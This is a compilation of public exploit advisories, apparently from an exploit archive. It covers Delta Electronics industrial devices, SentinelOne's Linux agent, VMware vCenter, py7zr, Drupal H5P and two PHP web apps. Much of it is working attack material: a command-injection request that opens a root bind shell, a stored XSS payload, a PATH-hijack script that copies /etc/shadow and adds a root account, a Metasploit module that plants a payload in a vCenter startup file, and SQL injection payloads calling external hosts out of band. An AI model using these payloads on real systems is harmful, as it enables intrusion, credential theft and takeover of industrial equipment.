<pre><code>CyberDanube Security Research 20221130-1<br />-------------------------------------------------------------------------------<br /> title| Authenticated Command Injection<br /> product| Delta Electronics DVW-W02W2-E2<br /> vulnerable version| V2.42<br /> fixed version| V2.5.2<br /> CVE number| -<br /> impact| High<br /> homepage| https://www.deltaww.com<br /> found| 2022-08-01<br /> by| T. Weber (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"Delta, founded in 1971, is a global provider of power and thermal <br />management<br />solutions. Its mission statement, "To provide innovative, clean and energy<br />-efficient solutions for a better tomorrow," focuses on addressing key<br />environmental issues such as global climate change. As an energy-saving<br />solutions provider with core competencies in power electronics and <br />automation,<br />Delta's business categories include Power Electronics, Automation, and<br />Infrastructure."<br /><br />Source: https://www.deltaww.com/en-US/about/aboutProfile<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />DVW-W02W2-E2 / V2.42<br /><br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The web server of the device is prone to an authenticated command injection.<br />It allows an attacker to gain full access to the underlying operating <br />system of<br />the device with all implications. If such a device is acting as key <br />device in<br />an industrial network, or controls various critical equipment via serial <br />ports,<br />more extensive damage in the corresponding network can be done by an <br />attacker.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The web server is prone to an authenticated command injection via POST<br />parameters. This is only possible if the "timestamp" parameter is set <br />correctly<br />in the URL. The following proof-of-concept shows how to open a port binding<br />shell on port 8889 with a "utelnetd" listener:<br />===============================================================================<br />POST /apply.cgi?/MT_ping.htm%20timestamp=$correct-timestamp$ HTTP/1.1<br />Host: 192.168.3.148<br />Accept: <br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 105<br />Origin: http://192.168.3.148<br />Connection: close<br />Referer: http://192.168.3.148/MT_ping.htm<br />Cookie: xxid=1973719449<br />Upgrade-Insecure-Requests: 1<br /><br />submit_flag=mt_ping&hid_ver1=&hid_ser1=&hid_comm1=&hid_ver2=&hid_ser2=&hid_comm2=&destination=`utelnetd%20-p%208889%20-l%20/bin/ash%20-d`<br />===============================================================================<br /><br />For accessing the device, the command "netcat" can be used:<br />===============================================================================<br />$ nc 192.168.3.150 8889<br />����!����<br /><br />BusyBox v1.4.2 (2016-08-18 22:45:41 EDT) Built-in shell (ash)<br />Enter 'help' for a list of built-in commands.<br /><br />/ #<br />===============================================================================<br /><br />The vulnerability was manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Update to firmware version V2.5.2.<br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends Delta Electronics customers to upgrade the <br />firmware to<br />the latest version available.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2022-08-02: Contacting Delta Electronics.<br />2022-08-10: Vendor requested the advisory without encryption; Sent <br />advisory to<br /> Delta Electronics.<br />2022-08-16: Security contact asked few questions regarding responsible<br /> disclosure; Sent answers.<br />2022-08-30: Asked for an update.<br />2022-09-01: Vendor responded, that they will need more time to resolve the<br /> issues; Provided additional 30 days (until 2022-11-02) for <br />patching.<br />2022-10-11: Asked for an update.<br />2022-10-12: Vendor responded, that fixing will be done 2022-11-15; Shifted<br /> release date to this date.<br />2022-10-16: Vendor shifted release date again to 2022-11-18. Shifted <br />advisory<br /> release date to the same day.<br />2022-10-17: Asked for an update regarding the release; No answer.<br />2022-10-18: Asked for an update and shifted release date to 2022-10-22.<br />2022-10-19: Vendor responded, that there were problems at releasing the <br />patch.<br /> Contact stated, that the patch will delay until end of <br />November.<br />2022-10-21: Asked vendor for a concrete release date; No answer.<br />2022-10-28: Announced advisory release date for 2022-10-30 to vendor.<br />2022-10-29: Found firmware patches with issue date 2022-11-25 on vendors<br /> website.<br />2022-10-30: Vendor confirmed fixes. Coordinated release of security <br />advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF T. Weber / @2022<br /><br /></code></pre>
<pre><code>CyberDanube Security Research 20221130-0<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities<br /> product| Delta Electronics DX-2100-L1-CN<br /> vulnerable version| V1.5.0.10<br /> fixed version| V1.5.0.12<br /> CVE number| -<br /> impact| High<br /> homepage| https://www.deltaww.com<br /> found| 2022-08-01<br /> by| T. Weber (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"Delta, founded in 1971, is a global provider of power and thermal <br />management<br />solutions. Its mission statement, "To provide innovative, clean and energy<br />-efficient solutions for a better tomorrow," focuses on addressing key<br />environmental issues such as global climate change. As an energy-saving<br />solutions provider with core competencies in power electronics and <br />automation,<br />Delta's business categories include Power Electronics, Automation, and<br />Infrastructure."<br /><br />Source: https://www.deltaww.com/en-US/about/aboutProfile<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />DX-2100-L1-CN / V1.5.0.10<br /><br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />An authenticated command injection has been identified in the web <br />configuration<br />service of the device. It can be used to execute system commands on the <br />OS from<br />the device in the context of the user "root". Therefore, a full <br />compromization<br />of the device is possible by having credentials for the web service only.<br /><br />2) Stored Cross-Site Scripting<br />A stored cross-site scripting vulnerability has been identified in the <br />function<br />"net diagnosis" on the device's web configuration service. This can be<br />exploited in the context of a victim's session.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The parameter "diagnose_address" contains the payload ";ls /;", which <br />basically<br />prints the content of the root directory to the serial terminal of the <br />device.<br /><br />http://192.168.3.150/lform/net_diagnose?action=diagnose&diagnose_type=0&diagnose_address=;ls%20/;<br /><br />The output can be seen in the context of a virtualized firmware clone, <br />as used<br />to find this vulnerability, but is usually invisible to a customer. <br />Therefore,<br />a more visible payload may be commands that interact via the network, like<br />";ping 192.168.0.10;". This command will ping a device on the <br />corresponding IP<br />address within the local network.<br /><br />2) Stored Cross-Site Scripting<br />The following code prints the current cached cookies of a user's session <br />to the<br />screen. The JavaScript code will be stored on the device permanently.<br />===============================================================================<br />POST /lform/urlfilter?action=save HTTP/1.1<br />Host: 192.168.3.150<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 190<br />Connection: keep-alive<br />Cookie: language=en_US; userindex=1; loginexpire=1648630746607; session=30<br /><br />lan_ipaddr=192.168.5.5&lan_netmask=255.255.255.0&src_addr_start=&src_addr_end=&editnum=0&bfilter_urllist=0&url_addr=<script>alert(document.cookie)</script>&src_addr_type=0&filter_state=1<br />===============================================================================<br /><br />The vulnerabilities were manually verified on an emulated device by <br />using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Update to firmware version V1.5.0.12.<br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends Delta Electronics customers to upgrade the <br />firmware to<br />the latest version available.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2022-08-02: Contacting Delta Electronics.<br />2022-08-10: Vendor requested the advisory without encryption; Sent <br />advisory to<br /> Delta Electronics.<br />2022-08-16: Security contact asked few questions regarding responsible<br /> disclosure; Sent answers.<br />2022-08-30: Asked for an update.<br />2022-09-01: Vendor responded, that they will need more time to resolve the<br /> issues; Provided additional 30 days (until 2022-11-02) for <br />patching.<br />2022-10-11: Asked for an update.<br />2022-10-12: Vendor responded, that fixing will be done 2022-11-15; Shifted<br /> release date to this date.<br />2022-10-16: Vendor shifted release date again to 2022-11-18. Shifted <br />advisory<br /> release date to the same day.<br />2022-10-17: Asked for an update regarding the release; No answer.<br />2022-10-18: Asked for an update and shifted release date to 2022-10-22.<br />2022-10-19: Vendor responded, that there were problems at releasing the <br />patch.<br /> Contact stated, that the patch will delay until end of <br />November.<br />2022-10-21: Asked vendor for a concrete release date; No answer.<br />2022-10-28: Announced advisory release date for 2022-10-30 to vendor.<br />2022-10-29: Found firmware patches with issue date 2022-11-25 on vendors<br /> website.<br />2022-10-30: Vendor confirmed fixes. Coordinated release of security <br />advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF T. Weber / @2022<br /><br /></code></pre>
<pre><code>Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability<br />Date: 12/06/2022<br />Exploit Author: ouch_this_hurts<br />Vendor Homepage: https://www.sentinelone.com/<br />Software Link: https://assets.sentinelone.com/prod/s1-linux-agent-datas<br />Version: 22.3.2.5<br />Tested on: Ubuntu 22.04.x<br />CVE: NA<br /><br />Not enough AI in the world can help you write secure software it seems? The vendor doesnt make reporting vulnerabilities easy, so to exploit-db it goes :)<br /><br />Protips:<br />- If I Google you, and I cannot find an easy way to report the vulnerability, I'm not going to bother.<br />- If you require me to use HackerOne, I'm not going to bother.<br />- If you dont have a security.txt, how do you expect me to contact you?<br /><br />Get `root` on a system with `sentinelagent<=22.3.2.5` with one simple trick:<br /><br />Override `grep` in the `PATH` with your malicious code. Reboot. pwnd. Nice!<br /><br />PoC below:<br />1. Find the systems "earliest" `PATH`, or just override it to whatever you want in `/etc/environment` with some other staged exploit.<br />2. Create the following `grep` file in that directory and make sure its executable:<br /><br /> ```shell<br /> cat << SENTINELOOPS > /usr/local/bin/grep<br /> #!/bin/bash<br /> # I think I'll have the passwds pl0x<br /> cat /etc/shadow > /tmp/etc_shadow<br /><br /> # password is password :)<br /> echo 'sentinel_oops:\$1\$user1\$WuzQ29wbcMN09VLW7X0/q1:0:0::/root:/bin/sh' >> /etc/passwd<br /> SENTINELOOPS<br /><br /> chmod +x /usr/local/bin/grep<br /> ```<br /><br />3. Wait for machine to reboot, login as `sentinel_oops:password` :)<br /><br /> ```<br /> $ su sentinel_oops<br /> Password: <br /> # whoami <br /> root<br /> ```<br /><br />What actually happened here? On `sentinelagent` start it runs `sh -c "grep...."`.<br /><br />So there are potentially other ways of privilege escalation via this "agent"?<br />- `grep` as demonstrated above<br />- `pgrep` examining the binary appears to be vulnerable<br />- `xargs` examining the binary appears to be vulnerable<br />- `cat` examining the binary appears to be vulnerable<br />- `pgrep` examining the binary appears to be vulnerable<br />- `ldd` examining the binary appears to be vulnerable<br />- `lsmod` examining the binary appears to be vulnerable<br />- `mksh` examining the binary appears to be vulnerable<br />- `awk` examining the binary appears to be vulnerable<br /><br />[CWE-427](https://cwe.mitre.org/data/definitions/427.html) and [how to write secure software](https://youtu.be/RfiQYRn7fBg?t=16)<br /></code></pre>
<pre><code>CVE-2022-44900: path traversal vulnerability in py7zr<br /><br />Directory traversal vulnerability in SevenZipFile.extractall() function of<br />the python library py7zr version 0.20.0 and earlier allow attackers to read<br />arbitrary files on the local machine via malicious 7z file extraction.<br /><br />CVE-2022-44900 <https://www.cve.org/CVERecord?id=CVE-2022-44900><br />vulnerability allows attackers to achieve arbitrary file read and arbitrary<br />file write. To do so, an attacker needs to create a malicious 7z archive<br />containing a symlink to achieve an arbitrary file read and a file with a<br />path traversal payload as name to achieve an arbitrary file write.<br />Exploiting<br /><br />The script used for tests is the following:<br /><br />import py7zr<br />import click<br /><br />@click.command()<br />@click.argument("filename")<br /><br />def main_procedure(filename):<br /> with py7zr.SevenZipFile(filename, 'r') as archive:<br /> archive.extractall()<br /> <br />main_procedure()<br /><br />The vulnerabile function targeted is py7zr.SevenZipFile.extractall().<br /><br />A lab setup has been built to test for vulnerabilities. Directories<br />structured as follow were used:<br /><br />├── start_point<br />│ ├── archive.7z<br />│ └── py7zr_test.py<br />└── target<br /> ├── write<br /> └── read<br /><br />The start_point directory contains the script used for tests and the<br />malicious archive containing the path traversal payload in the form of the<br />filename of an archived file.<br /><br />To achieve an arbitrary file read, one of the files in the archives needs<br />to have ../target/write set as name. The content of the file will be<br />written into target/write.<br /><br />In a similar way, to achieve an arbitrary file read, a symlink pointing to<br />../target/read needs to be present in the archive. When extracted the<br />symlink will consist of the content of target/read.<br />Disclosure timeline<br /><br />29/10/2022 - Maintainer was notified privately of the vulnerabilities<br />30/10/2022 - Response from maintainer<br />01/11/2022 - Release of patched version 0.20.1<br />01/11/2022 - CVE ID request<br />06/12/2022 - CVE ID obtained<br />06/12/2022 - Public disclosure<br />------------------------------<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ManualRanking<br /><br /> include Msf::Post::Linux::Priv<br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'VMware vCenter vScalation Priv Esc',<br /> 'Description' => %q{<br /> This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the<br /> /usr/lib/vmware-vmon/java-wrapper-vmon file. It is possible for anyone in the<br /> cis group to write to the file, which will execute as root on vmware-vmon service<br /> restart or host reboot.<br /><br /> This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.<br /> The following versions should be vulnerable:<br /> vCenter 7.0 before U2c<br /> vCenter 6.7 before U3o<br /> vCenter 6.5 before U3q<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'Yuval Lazar' # original PoC, analysis<br /> ],<br /> 'Platform' => [ 'linux' ],<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Targets' => [[ 'Auto', {} ]],<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'URL', 'https://pentera.io/blog/vscalation-cve-2021-22015-local-privilege-escalation-in-vmware-vcenter-pentera-labs/' ],<br /> [ 'CVE', '2021-22015' ],<br /> [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html' ]<br /> ],<br /> 'DisclosureDate' => '2021-09-21',<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'WfsDelay' => 1800 # 30min<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SERVICE_DOWN],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS],<br /> 'AKA' => ['vScalation']<br /> }<br /> )<br /> )<br /> register_advanced_options [<br /> OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])<br /> ]<br /> end<br /><br /> # Simplify pulling the writable directory variable<br /> def base_dir<br /> datastore['WritableDir'].to_s<br /> end<br /><br /> def java_wrapper_vmon<br /> '/usr/lib/vmware-vmon/java-wrapper-vmon'<br /> end<br /><br /> def check<br /> group_owner = cmd_exec("stat -c \"%G\" \"#{java_wrapper_vmon}\"")<br /> if writable?(java_wrapper_vmon) && group_owner == 'cis'<br /> return CheckCode::Appears("#{java_wrapper_vmon} is writable and owned by cis group")<br /> end<br /><br /> CheckCode::Safe("#{java_wrapper_vmon} not owned by 'cis' group (owned by '#{group_owner}'), or not writable")<br /> end<br /><br /> def exploit<br /> # Check if we're already root<br /> if is_root? && !datastore['ForceExploit']<br /> fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'<br /> end<br /><br /> # Make sure we can write our exploit and payload to the local system<br /> unless writable? base_dir<br /> fail_with Failure::BadConfig, "#{base_dir} is not writable"<br /> end<br /><br /> # backup the original file<br /> @backup = read_file(java_wrapper_vmon)<br /> path = store_loot(<br /> 'java-wrapper-vmon.text',<br /> 'text/plain',<br /> rhost,<br /> @backup,<br /> 'java-wrapper-vmon.text'<br /> )<br /> print_good("Original #{java_wrapper_vmon} backed up to #{path}")<br /><br /> # Upload payload executable<br /> payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"<br /> print_status("Writing payload to #{payload_path}")<br /> upload_and_chmodx payload_path, generate_payload_exe<br /> register_files_for_cleanup payload_path<br /><br /> # write trojaned file<br /> # we want to write our payload towards the top to ensure it gets run<br /> # writing it at the bottom of the file results in the payload not being run<br /> print_status("Writing trojaned #{java_wrapper_vmon}")<br /> write_file(java_wrapper_vmon, @backup.gsub('#!/bin/sh', "#!/bin/sh\n#{payload_path} &\n"))<br /><br /> # try to restart the service<br /> print_status('Attempting to restart vmware-vmon service (systemctl restart vmware-vmon.service)')<br /> service_restart = cmd_exec('systemctl restart vmware-vmon.service')<br /> # one error i'm seeing when using vsphere-client is: Failed to restart vmware-vmon.service: The name org.freedesktop.PolicyKit1 was not provided by any .service files<br /> if service_restart.downcase.include?('access denied') || service_restart.downcase.include?('failed')<br /> print_bad('vmware-vmon service needs to be restarted, or host rebooted to obtain shell.')<br /> end<br /> print_status("Waiting #{datastore['WfsDelay']} seconds for shell")<br /> end<br /><br /> def cleanup<br /> unless @backup.nil?<br /> print_status("Replacing trojaned #{java_wrapper_vmon} with original")<br /> write_file(java_wrapper_vmon, @backup)<br /> end<br /> super<br /> end<br />end<br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.5.1 a.k.a SLIMS 9 SQLi<br />## Author: nu11secur1ty<br />## Date: 12.06.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://slims.web.id/web/news/rilis-9.5.1/<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1<br /><br />## Description:<br />The manual insertion `point 4` appears to be vulnerable to SQL<br />injection attacks.<br />The payload '+(select<br />load_file('\\\\mmceb8f9w8n0s3mutza4ttmxzo5it8hzknbdy6mv.again.com\\ejf'))+'<br />was submitted in the manual insertion `point 4` testing.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can execute a very dangerous `subquery` to view very<br />sensitive information.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payload:<br /><br />```MySQL<br />GET /slims9_bulian-9.5.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb%27%2b(select*from(select(sleep(5)))a)%2b%27&membershipType=a&collType=aaaa<br />HTTP/1.1<br />Host: pwnedhost.com<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SenayanAdmin=tc5upjgvv2j3mid2ur5tdmmpje; admin_logged_in=1;<br />SenayanMember=schm4nbtgbb5i1tbeonr6cav3u<br />Connection: close<br /><br />```<br />[+] Response:<br /><br />```MySQL<br />HTTP/1.1 200 OK<br />Date: Tue, 06 Dec 2022 13:51:38 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Frame-Options: SAMEORIGIN<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />X-XSS-Protection: 1; mode=block<br />Content-Length: 4120<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><!doctype html><br /><html><br /><head><title>Loan Report by Class Report</title><br /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><br /> <meta http-equiv="Pragma" content="no-cache"/><br /> <meta http-equiv="Cache-Control" content="no-store, no-cache,<br />must-revalidate, post-check=0, pre-check=0"/><br /> <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/><br /> <link rel="stylesheet" type="text/css"<br />href="/slims9_bulian-9.5.1/css/bootstrap.min.css"/><br /> <link rel="stylesheet" type="text/css"<br />href="/slims9_bulian-9.5.1/admin/admin_template/default/style.css?31085233"/><br /> <script type="text/javascript"<br />src="/slims9_bulian-9.5.1/js/jquery.js"></script><br /> <script type="text/javascript"<br />src="/slims9_bulian-9.5.1/js/gui.js"></script><br /></head><br /><body><br /><div id="pageContent"><br /> <div class="mb-2">Loan Recap By Class<br /><strong>bbbb'+(select*from(select(sleep(5)))a)+'</strong> for year<br /><strong>2002</strong> <a class="s-btn btn btn-default printReport"<br />onclick="window.print()" href="#">Print Current Page</a><a<br />href="../xlsoutput.php" class="s-btn btn btn-default"<br />target="_BLANK">Export to spreadsheet format</a><br /> <a class="s-btn btn btn-info notAJAX openPopUp"<br />href="/slims9_bulian-9.5.1/admin/modules/reporting/pop_chart.php"<br />width="700" height="530" title="Loan Recap By Class">Show in<br />chart/plot</a></div><br /><table class="s-table table table-sm table-bordered"><tr><th<br />class="dataListHeaderPrinted">Classification</th><th<br />class="dataListHeaderPrinted">Jan</th><th<br />class="dataListHeaderPrinted">Feb</th><th<br />class="dataListHeaderPrinted">Mar</th><th<br />class="dataListHeaderPrinted">Apr</th><th<br />class="dataListHeaderPrinted">May</th><th<br />class="dataListHeaderPrinted">Jun</th><th<br />class="dataListHeaderPrinted">Jul</th><th<br />class="dataListHeaderPrinted">Aug</th><th<br />class="dataListHeaderPrinted">Sep</th><th<br />class="dataListHeaderPrinted">Oct</th><th<br />class="dataListHeaderPrinted">Nov</th><th<br />class="dataListHeaderPrinted">Dec</th></tr><tr><td><strong>bbbb'+(select*from(select(sleep(5)))a)+'00</strong></td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'00</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'10</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'20</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'30</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'40</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'50</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'60</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'70</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'80</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'90</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td></table></div><br /><div class="loader"></div><br /><!-- block if we inside iframe --><br /><script type="text/javascript"><br /> // if we are inside iframe<br /> jQuery(document).ready(function () {<br /> });<br /></script><br /></body><br /></html><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/gthu91)<br /><br />## Time spent<br />`04:00:00`<br /><br /></code></pre>
<pre><code>------------------------------------------------------------------<br />Drupal H5P Module <= 2.0.0 (isValidPackage) Zip Slip Vulnerability<br />------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.drupal.org/project/h5p<br /><br /><br />[-] Affected Versions:<br /><br />Version 2.0.0-alpha2 and prior versions.<br />Version 7.x-1.50 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located within the H5PValidator::isValidPackage() <br />method. This implements the following check in order to skip any file or <br />folder starting with a dot or underscore within the uploaded h5p <br />archive:<br /><br />891. $fileName = $zip->statIndex($i)['name'];<br />892.<br />893. if (preg_match('/(^[\._]|\/[\._])/', $fileName) !== 0) {<br />894. continue; // Skip any file or folder starting with a . or _<br />894. }<br /><br />This regex check should be enough to prevent path traversal attacks <br />through zipped filenames (Zip Slip attacks), because it checks for the <br />string “/.” within the filename, thus preventing directory traversal <br />attacks. However, the vulnerability exists if Drupal is running on a <br />Windows server, because in this case the attacker can provide a <br />malicious h5p archive containing a filename with path traversal <br />sequences like “..\..\..”, which would bypass the above regex check. <br />This can be exploited to write (or overwrite) semi-arbitrary files in <br />the file system via directory traversal sequences, potentially leading <br />to Stored Cross-Site Scripting (XSS) and other kind of attacks.<br /><br /><br />[-] Solution:<br /><br />No official solution is currently available.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[22/11/2021] - Vendor notified<br />[28/02/2022] - Vendor proposed a possible patch<br />[28/02/2022] - Vendor notified about the ineffective patch, provided a <br />fix suggestion<br />[01/03/2022] - Vendor fixed the previous patch<br />[30/03/2022] - Asked update about the public disclosure and release of a <br />patch, no response<br />[22/11/2022] - After one year still no official solution available<br />[03/12/2022] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has not assigned a CVE identifier for this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://security.drupal.org/node/175968<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2022-06<br /><br /></code></pre>
<pre><code>## Title: ASMS - PHP (by: oretnom23 ) v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 12.03.2022<br />## Vendor: https://github.com/oretnom23,<br />https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/download-code?nid=15312&title=Automotive+Shop+Management+System+in+PHP%2FOOP+Free+Source+Code<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0<br /><br />## Description:<br />The `id` parameter appears to be vulnerable to SQL injection attacks.<br />The attacker can dump all database information without any problems,<br />and then he can destroy this system, it is depending<br />from the scenario.<br /><br />## STATUS: Critically awful<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: id=7'+(select<br />load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+''<br />OR NOT 9828=9828 AND 'NWsG'='NWsG<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=7'+(select<br />load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+''<br />AND (SELECT 9682 FROM (SELECT(SLEEP(5)))Oifb) AND 'zARc'='zARc<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 8 columns<br /> Payload: id=7'+(select<br />load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+''<br />UNION ALL SELECT<br />NULL,CONCAT(0x7176626271,0x71504455436c68624e7878795354674d76627a4b4164756a4c46537651584b67584d744963504b5a,0x716a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL#<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/c5v75u)<br /><br />## Time spent<br />`00:27:00`<br /><br />## Time attack<br />`00:01:57`<br /><br /></code></pre>
